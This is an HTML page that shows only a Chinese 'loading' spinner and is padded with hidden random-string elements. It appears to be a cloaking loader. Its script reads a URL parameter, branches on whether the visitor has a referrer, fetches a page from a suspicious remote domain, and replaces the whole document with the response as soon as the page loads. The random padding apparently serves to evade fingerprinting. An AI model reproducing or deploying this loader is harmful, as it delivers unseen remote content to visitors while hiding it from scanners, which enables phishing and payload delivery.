<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .AQJvsfVB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .AQJvsfVB .svJnW5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .AQJvsfVB .content {
            line-height: 50px;
            text-align: center
        }

        .AQJvsfVB .img {
            width: 100%
        }

        .AQJvsfVB .TJ9hIkZK {
            text-align: center
        }

        .AQJvsfVB .TJ9hIkZK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .AQJvsfVB .TJ9hIkZK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .AQJvsfVB .TJ9hIkZK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .AQJvsfVB .TJ9hIkZK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .AQJvsfVB .TJ9hIkZK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .AQJvsfVB .TJ9hIkZK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .AQJvsfVB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function RsNx2aDYoGD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DjX4Ap = RsNx2aDYoGD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DjX4Ap +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DjX4Ap +".html?a=share";
		}
		
        lPQ3Pd4=url+"#"+new Date().getTime();
        lPQ3Pd4 && function() {
            $.get(lPQ3Pd4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>zMZVupxmnmZ1</p>
<b style='display:none' >ap1lV46fyxxxdCsSE8rXX7HmbxzLU3Xz</b><div class="AQJvsfVB">
    <div class="svJnW5">
        <div class="TJ9hIkZK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >be81x1W7VVY0ByCDP9vhPBYoCetHH5VW35NX</b>
<a  href='#' style='display:none'>PelHzemytEMgGbvSr5Sdq0P7T3mqblw6M2KBXto7tvMhDdB</a>
<p  style='display:none'>Ci2b8PUJ4MDrFxQGYKh1NIzpybwbCMMBDce2x4arZhHa6RTTq4i6LORb1otF0w2Qq0uWRy</p>
<span style='display:none'>ZqQdze1XiBzXq2ERvUGt1UMzJi9t39Jg9XGYJsgNLA0Bn6tSEk1dMQJoivjvuwh9tMWrBk4</span>
<div style='display:none'>rWINo6jeDxBP7lRZMo3I8FIz2d1MweUXf</div>
<ul style='display:none' >fKFRVeBHndTaueo3rJVT18KIjarnXd9KwQR60Dj2DfgPEKwKvQT3a1tV</ul>
<h1 style='display:none' >JPstriM2v5yYgu1PqLrMZJmzq9</h1></body>
</html>